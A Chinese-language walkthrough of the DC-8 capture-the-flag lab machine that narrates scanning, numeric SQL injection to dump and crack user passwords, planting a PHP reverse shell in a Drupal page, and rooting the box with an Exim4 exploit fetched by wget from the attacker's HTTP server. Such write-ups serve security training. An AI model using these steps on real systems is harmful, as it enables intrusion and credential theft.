DC-8靶机实战
nmap扫一下
主机发现
全扫描:
用drupal cms扫描器扫一下
7.67版本,卡得不上不下的,难搞喔
发现了存在php这个插件,如果能进到后台,执行一波php代码,反弹shell就好了
后面又是各种一顿扫,没有发现什么有用的,然后就去手动到网站找漏洞
后面遇到一个页面。以为有xml注入,结果尝试无果
最后找到了一个注入点
数字型注入,手工几下就拿到了users里面的admin 的口令和john 口令
john爆破了一下,admin的口令没有爆破出来,到是拿到john 口令
后台登录:
没有权限增加content,但能修改一个content
加入反弹shell代码,选择php code
然后到该页面填写提交,记得还是要填规范。不然报错也不会执行里面的反弹shell的
然后找提取的突破口
发现了exim4,看看版本
msf 精确搜索
选择本地权限提升的脚本
改成root.sh
看了一下内容,本地权限提升参数 -m netcat
kali打开http服务
下载到靶机
wget http://192.168.206.128:8000/root.sh
记得下载到可写目录
chmod +x root.sh
执行
出现了这个问题,脚本必须设置成unix
vim打开。set ff=unix
然后保存退出,再下载
执行
提权成功
读取flag